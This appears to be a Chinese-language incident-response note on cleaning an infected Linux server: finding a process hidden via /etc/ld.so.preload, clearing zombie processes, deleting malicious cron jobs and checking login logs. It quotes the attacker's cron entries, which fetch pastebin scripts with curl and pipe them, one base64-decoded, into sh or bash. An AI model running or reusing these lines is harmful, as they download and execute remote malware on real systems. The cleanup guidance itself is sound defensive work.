查看哪个进程占据cup
通过 top 或者使用 ps aux
我这个通过top 命令看不到哪个进程占用了cup ,执行 cat /etc/ld.so.preload 查看,里面也加载了异常的文件,判断是用于隐藏进程用的, 建议将其内容注释掉或删除,执行ldconfig 然后再使用top 查看下进程。
查找进程文件删除
ps -ef|grep shutdown [命令] 或者 /proc/4170 [pid]
找出系统中所有的僵尸进程
ps aux | grep 'defunct'
或
ps -ef | grep defunct | grep -v grep | wc -l
清理僵尸进程
ps -e -o ppid,stat | grep Z | cut -d" " -f2 | xargs kill -9
或
kill -HUP `ps -A -ostat,ppid | grep -e '^[Zz]' | awk '{print $2}'`
查找系统中的定时任务
crontab -l
或者
cd /var/spool/cron #查看这个文件夹下的文件删除
vim /etc/crontab
里面会有一个定时任务我的分别是一下这几个(删除), 浏览器打开网址是个脚本,通过base64 加密,解密即可看到脚本内容
* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh */1 * * * root /bin/sh /bin/httpdns /usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash
根据脚本删除脚本创建的文件,我这里删除的是
/usr/local/lib/libjdk.so ,/etc/ld.so.preload
查看系统登录日志
日志文件 /var/log/wtmp ,系统的每一次登录,都会在此日志中添加记录,为了防止有人篡改,该文件为二进制文件
cd /var/log ; last 或者 last -f /var/log/wtmp
关闭不需要的端口,屏蔽访问脚本中的域名 ip